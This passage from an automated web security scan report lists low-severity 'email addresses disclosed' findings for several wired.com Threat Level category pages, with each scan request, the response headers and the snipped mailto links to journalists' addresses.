<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.53. http://www.wired.com/threatlevel/category/defcon/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/defcon/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/category/defcon/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:36 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=167
Expires: Wed, 12 Jan 2011 15:32:33 GMT
Date: Wed, 12 Jan 2011 15:29:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<p>The hacker noted that ...someone@wikileaks.org writes about problems with their leader and problems with money. He sends a PDF (was published to the site recently), some chat logs, and information about the encryption process for submits that he t
...[SNIP]...
<p>The whois record for Cryptome, which is hosted by Network Solutions, listed the site contact address as jya@pipeline.com, one of Young&#8217;s accounts.</p>
...[SNIP]...
<a href="mailto:dave@eecue.com">
...[SNIP]...
<a href="mailto:threatlevel1@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:eecue@eecue.com">
...[SNIP]...
<a href="mailto:eecue@eecue.com">
...[SNIP]...
<a href="mailto:eecue@eecue.com">
...[SNIP]...
<a href="mailto:eecue@eecue.com">
...[SNIP]...
<a href="mailto:eecue@eecue.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.54. http://www.wired.com/threatlevel/category/digital-millennium-copyright-act/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/digital-millennium-copyright-act/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/category/digital-millennium-copyright-act/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:44 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=283
Expires: Wed, 12 Jan 2011 15:34:30 GMT
Date: Wed, 12 Jan 2011 15:29:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.55. http://www.wired.com/threatlevel/category/e-voting/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/e-voting/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/category/e-voting/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:53 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=215
Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:29:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.56. http://www.wired.com/threatlevel/category/elections/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/elections/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/category/elections/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:57 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=263
Expires: Wed, 12 Jan 2011 15:34:13 GMT
Date: Wed, 12 Jan 2011 15:29:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:evan@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:editor@wired.co.uk">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.57. http://www.wired.com/threatlevel/category/fed-blotter/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/fed-blotter/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/category/fed-blotter/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (